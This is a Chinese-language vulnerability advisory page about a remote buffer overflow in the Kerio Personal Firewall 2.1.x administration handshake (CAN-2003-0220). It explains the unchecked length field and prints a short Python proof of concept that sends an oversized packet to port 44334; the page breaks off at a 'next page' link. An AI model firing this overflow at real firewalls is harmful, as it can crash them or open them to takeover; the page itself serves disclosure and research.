当前位置：首页 » 服务器技术

开发技术指南» 文章正文

    引言： 安全公告（或线索）提供热线：51cto.editor@gmail

Kerio Personal Firewall验证包远程缓冲区溢出漏洞

【相关文章: Apache mod_python模块】

【扩展阅读: rsync服务远程堆破坏漏洞】

信息提供： 【扩展信息: Sun Fire系统恶意ARP包远程拒】

安全公告（或线索）提供热线：51cto.editor@gmail.com

漏洞类别：

溢出错误

攻击类型：

本地越权访问

发布日期：

2003-04-28

更新日期：

2003-05-15

受影响系统：

kerio personal firewall 2 2.1.4

kerio personal firewall 2 2.1.3

kerio personal firewall 2 2.1.2

kerio personal firewall 2 2.1.1

kerio personal firewall 2 2.1

安全系统：

无

漏洞报告人：

core security technologies advisory

漏洞描述：

bugtraq  id: 7180

cve(can) id: can-2003-0220

kerio personal firewall (kpf)是一款个人防火墙系统。

kerio个人防火墙管理验证处理过程存在问题，远程攻击者可以利用这个漏洞伪造恶意包触发缓冲区溢出，可能以管理员权限在系统上执行任意指令。

当管理员连接防火墙时会进行握手连接，用于建立加密会话，握手的第4个包(第一个包是管理员发送)包含4字节数据，其中有一定固定值0x40 (64)指示后续的包含管理员密钥的包的大小。防火墙端在使用recv()处理这个数据的时候没有进行边界缓冲区检查，如果攻击者伪造包含超大数据的包发送给防火墙，此数据就会被读取到内存缓冲区时而发生缓冲区溢出，精心构建提交数据可能以系统管理员权限在系统上执行任意指令。

测试方法：

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

---------------------

import os

import socket

import struct

import string

def g():

     fd = socket.socket(socket.af_inet, socket.sock_stream)

     try:

         fd.connect(('192.168.66.160', 44334))

         fd.recv(10)

         fd.recv(256)

         fd.send(struct.pack('!l', 0x149c))

         astr = 'a'*0x149c

         fd.send(astr)

     except exception, e:

         print e

         pass

...   下一页

» 本期热门文章：

· 热门栏目：

» 相关精选文章

» 其它相关：